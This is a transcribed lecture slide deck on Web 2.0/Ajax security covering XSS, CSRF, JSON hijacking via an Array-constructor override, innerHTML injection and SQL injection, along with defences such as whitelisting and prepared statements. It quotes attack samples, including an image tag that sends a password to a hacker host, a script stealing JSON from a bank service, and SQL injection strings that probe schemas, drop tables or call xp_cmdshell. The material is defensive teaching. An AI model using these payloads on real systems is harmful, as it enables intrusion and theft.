Some Facts Web 2.0/Ajax Security

Similar documents
WEB SECURITY: XSS & CSRF

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.

RKN 2015 Application Layer Short Summary

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

WHY CSRF WORKS. Implicit authentication by Web browsers

CS 161 Computer Security

Common Websites Security Issues. Ziv Perry

Web Application Security. Philippe Bogaerts

CSCD 303 Essential Computer Security Fall 2018

Security. CSC309 TA: Sukwon Oh

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

PHP Security. Kevin Schroeder Zend Technologies. Copyright 2007, Zend Technologies Inc.

last time: command injection

Application vulnerabilities and defences

CSCD 303 Essential Computer Security Fall 2017

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Information Security CS 526 Topic 8

Web Security II. Slides from M. Hicks, University of Maryland

Web Security: Vulnerabilities & Attacks

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

Web basics: HTTP cookies

Information Security. Gabriel Lawrence Director, IT Security UCSD

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Web Security. advanced topics on SOP. Yan Huang. Credits: slides adapted from Stanford and Cornell Tech

CIS 4360 Secure Computer Systems XSS

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Authentication and Password CS166 Introduction to Computer Security 2/11/18 CS166 1

Client Side Injection on Web Applications

Information Security CS 526 Topic 11

Computer Security CS 426 Lecture 41

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

P2_L12 Web Security Page 1

CS 5450 HTTP. Vitaly Shmatikov

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Web Security. Aggelos Kiayias Justin Neumann

Web 2.0 Attacks Explained

Combating Common Web App Authentication Threats

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Web Security IV: Cross-Site Attacks

Project 3 Web Security Part 1. Outline

WebGoat Lab session overview

Web Security: Vulnerabilities & Attacks

Security for the Web. Thanks to Dave Levin for some slides

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

Security issues. Unit 27 Web Server Scripting Extended Diploma in ICT 2016 Lecture: Phil Smith

Web Application Security

Web Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs

LECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security

NET 311 INFORMATION SECURITY

Web Security, Summer Term 2012

Sichere Software vom Java-Entwickler

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

Web Security, Summer Term 2012

DreamFactory Customer Privacy and Security Whitepaper Delivering Secure Applications on Salesforce.com

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

Application Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

For Bitcoins and Bounties James Kettle

IERG 4210 Tutorial 07. Securing web page (I): login page and admin user authentication Shizhan Zhu

CSCE 813 Internet Security Case Study II: XSS

Security for the Web. Thanks to Dave Levin for some slides

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Attacking Web2.0. Daiki Fukumori Secure Sky Technology Inc.

OWASP Top 10. from a developer s perspective. John Wilander, OWASP/Omegapoint, IBWAS 10

WELCOME. APEX Security Primer. About Enkitec. About the Presenter. ! Oracle Platinum Partner! Established in 2004

Content Security Policy

Progress Exchange June, Phoenix, AZ, USA 1


Human vs Artificial intelligence Battle of Trust

ISSA: EXPLOITATION AND SECURITY OF SAAS APPLICATIONS. Waqas Nazir - CEO - DigitSec, Inc.

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

SPOOFING. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006

Cross Site Request Forgery

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

HTTP Security Headers Explained

CS 142 Winter Session Management. Dan Boneh

Assignment 6: Web Security

eb Security Software Studio

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Web Applilicati tion S i ecur t ity SIRT Se u c i r ty ity T a r i aining April 9th, 2009

CS Paul Krzyzanowski

Web Security. Web Programming.

Computer Security. 14. Web Security. Paul Krzyzanowski. Rutgers University. Spring 2018

Unusual Web Bugs. A Web App Hacker s Bag O Tricks. Alex kuza55 K.

Building Secure PHP Apps

Browser code isolation

Slides adopted from Laurie Williams. OWASP Top Ten. John Slankas

CSC 482/582: Computer Security. Cross-Site Security

October 08: Introduction to Web Security

Web Security: XSS; Sessions

Transcription:

/publications/notes_and_slides Some Facts Web 2.0/Ajax Security Allen I. Holub Holub Associates allen@holub.com Hackers attack bugs. The more complex the system, the more bugs it will have. The entire ecosystem matters. A bug in EJB or Hibernate will make your app vulnerable. Perimeter defenses cannot protect weak software. If the castle walls are unbreachable, then subvert the economy. See Security-101 slides from /publications/notes_and_slides 1 2 SOA/SOAP Your code is public Most legacy apps were designed to run entirely inside the data center. A SOAP interface to that app allows a hacker to access a fundamentally insecure application through the firewall. There is no way to make that application secure short of a rewrite. The source code for half of your application is in the hands of the hacker. Try not to give away too much. All client-side protections can be subverted. E.g. figure the order total on both the client and server side. 3 4

/publications/notes_and_slides Man-in-the-middle HTTPS AJAX apps typically talk to the server using RPC or equivalent. The communication path between the client and server can be both monitored and modified by a man in the middle. Do not trust any function argument that arrives over the internet. The first thing a hacker is going to try is to give your application bogus data. HTTPS protects from the man in the middle, but doesn t protect from a hacker who is pretending to be your AJAX client. 5 6 Same-Origin Policy HTTPS and SOP Code loaded from site A cannot (in theory) access data or network resources from site B. That way a hacker can t inject code into a page that site A provides that sends protected data (passwords, etc.) to site B. SOP prevents an Ajax app from making an XMLHTTPRequest (or RPC call) to a URL that s not in domain from which the page was loaded. Not only must the request be to the same sever, but it must also use the same protocol. You cannot make an RPC-over-HTTPS call from a normal HTTP page. Your login page must be https:, and can serve the application on success. Do secure login panel by embedding an iframe with a src= https:// 7 8

/publications/notes_and_slides SOA can be subverted Cross-Site Scripting (XSS) A web page owns its own data and can submit it back to its server. Javascript can do anything that you could do in HTML. A web page can get data from anywhere. Eg. Insert an <img src= http://foo.com > tag into the DOM. But it can also send data in a read-only operation: <img src= http://foo.com?resolution=high > or <img height= 1 width= 1 src= http://hackerheaven.org?yourpassword=oops > Hacker s code can: Create a hidden iframe containing a <form> who s action is to submit to hacker s site. Create a hidden iframe, put your data into URL and then set frame s src to hacker s site. Create a <script> tag that does pretty much anything. Etc. 9 10 How does the evil code get into your page? Consider a user name of Fred <script>evil code</script> protected void doget(httpservletrequest req, HttpServletResponse resp) { PrintWriter out = resp.getwriter(); out.println( <html><body>hello + getusernamefromdatabase() + </body></html> ); } Or Alternatively Consider a page that echos back one of the URL arguments, when passed this URL: http://mydomain.com? name=dan%3cscript%20%3ealert%28 Note that an evil URL like this can exploit your page without any active involvement on your part. 11 12

/publications/notes_and_slides Don t trust user input The evils of cookies Solve the problem by performing whitelist testing on all user input. Accept only input that contains safe characters or sequences. E.g. Accept only alphanumerics. Do not do black-list testing Reject input that contains evil characters. It s too easy to miss something. E.g. Reject < > and % characters Consider a web site that uses cookies to hold login credentials so that a user can remain logged in. In theory, the cookie will be sent only to you the server that issued the page that set the cookie. The cookie expires after a set period of time, NOT when the user leaves your site. The cookie is sent every time the browser accesses your site, whether or not you need it. 13 14 Cross-site request forging (XSRF) This is an AJAX problem. A user logs into your ebay-like trading site (setting a cookie). A listing for an item has a more info link that goes to hackerheaven.com. Your user clicks on it. Hackerheaven.com the request came from your site. It returns a page to the browser that contains a <script> triggers some action on your site. Your site checks the cookie, sees that it s valid, and performs the action. Note that in a traditional web site, the hacker code won t be able to issue a request and then read the result (because of the SOA policy). In an AJAX world the server response can go anywhere (encoded in a URL, for example). An AJAX RPC call may not issue a response. The hacker can invoke the service without caring about the result. XSRF is a problem any time an operation is performed as a result of a single HTTP request, with no user-verification required. 15 16

/publications/notes_and_slides Solving XSRF JSON Don t use cookies for session info. Session ID s, login tokens, etc., should be passed as arguments to RPC calls (in the body of an HTTP Post, for example). That is, if the session ID is managed inside the JavaScript application, there s no way for the bad guy to get it. You can also compare a passed sessionid with one that comes from a cookie and make sure they match. Is a convenient way to pass structured data around. If data is represented as the source code for a JavaScript object, then you can let JavaScript do all the parsing. JSON data returned from an RPC call is easy to interpret by the calling function. 17 18 For Example: <script> insertion var result= [ value1, value2 ]; handle( { sessionid : 12345, username : Fred, data : [ 1, 2 ], } ); eval ( somejson ); JavaScript can add <script> tags to a document. Those <script> tags can load code from other sites. Useful for mashups. Doesn t violate the SOP because the code that s injecting the <script> tag is trusted. Yeah, right. These scripts often generate JSON results. 19 20

/publications/notes_and_slides JavaScript Array Hack Getting the data Redefine the Array constructor: function Array(){ alert( Hello ); } Verify that your constructor is called: var a = [43]; Use this feature: function Array(){ this[1] = 50; } var a = [40]; alert( a[0] + a[1] ); // yields 90 <script type='text/javascript > function Array() { var obj = this; var ind = 0; var getnext = function(x) { obj[ind++] setter = getnext; if (x) alert(data stolen from array: " + x.tostring()); }; this[ind++] setter = getnext; } </script> <script type='text/javascript' src='http://bank.com/jsonservice'> </script> 21 22 Protecting the JSON data To Read Further Wrap JSON data in a coment: /*[ foo, bar ]*/ This practice prevents the JSON data from being interpreted by a <script> tag. http://getahead.org/blog/joe/2007/03/ 05/json_is_not_as_safe_as_people_thin k_it_is.html http://robubu.com/?p=24 You ll have to strip the comments off before you can use the data yourself. 23 24

/publications/notes_and_slides Problems with innerhtml The Hack <html><head> <script language="javascript"> function fillmydiv(newcontent) { document.getelementbyid('mydiv'). innerhtml = newcontent; } </script> </head> <body> <div id="mydiv"></div> </body> </html> The hacker manages to get a user to pass in the following as newcontent: <div onmousemove="alert('hi!');"> Some text</div> An alert appears every time the user mouses over the div. 25 26 Don t trust strings SQL Injection Just because it came from your sever, doesn t mean it s safe. Though it s better to test for this stuff on the server than the client. Look for embeded <script> tags Look for embedded javascript: in URLs Consider a simple login screen, with a forgotten-password link. Prompt for an email login Email a password SELECT somefield FROM sometable WHERE somefield= $EMAIL 27 28

/publications/notes_and_slides Test for Vulnerability Enter foo@bar.com as an email, yeilding: SELECT somefield FROM sometable WHERE somefield= foo@bar.com Will create a SQL error. If the error message isn t email address unknown, then the site is probably vulnerable. Don t ever print the SQL error message! Prove that it s vulnerable Enter junk OR x = x as an email, yielding: SELECT somefield FROM sometable WHERE somefield= junk OR x = x Selects everything from the table! Result is: Login information sent to foo@bar.com Probably the first email in the table. 29 30 Guess a few field names Find the Table Name SELECT somefield FROM sometable WHERE somefield= x AND email is NULL;-- Fails if email is not a field. Keep trying other obvious column names until it works! SELECT somefield FROM sometable WHERE somefield= x AND 1=(SELECT COUNT(*) FROM tabname);-- Fails if tabname is not the table name. Keep trying other obvious table names until it works! 31 32

/publications/notes_and_slides DROP tablename Etc. You can put any SQL in there! UPDATE tablename Add yourself! Change a password! xp_cmdshell In SQLServer, executes an arbitrary OSlevel command! Prepared Statements Use Prepared statements SQL is precompiled, user input is added later and is not treated as SQL Bad: Statement s = connection.createstatement(); ResultSet = s.executequery( Select email from table where name= + formfield ); 33 34 The Solution Good PreparedStatement s = connection.preparestatement( select email from table where name=? ); ps.setstring(1, formfield); ResultSet = s.executequery(); Use Prepared Statements (2) Might not work if prepared statements are simulated in the driver. Don t do this: Statement s = connection.createstatement(); ResultSet = s.executequery( Select email from table where name= + formfield ); 35 36

/publications/notes_and_slides Other Precautions Some References Verify user input as safe. Use white-list testing (approve only valid characters as compared to rejecting invalid ones). Limit database permissions Login has read-only permission on table Assume that the bad guy can get full adminstrator access to machine! Limit information in error reports Do not show output from database server! Much of the material in this talk is discussed at: http://groups.google.com/group/google- Web-Toolkit/web/security-for-gwtapplications 37 38 Q&A Allen Holub Slides at http:/// publications/notes_and_slides 39

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback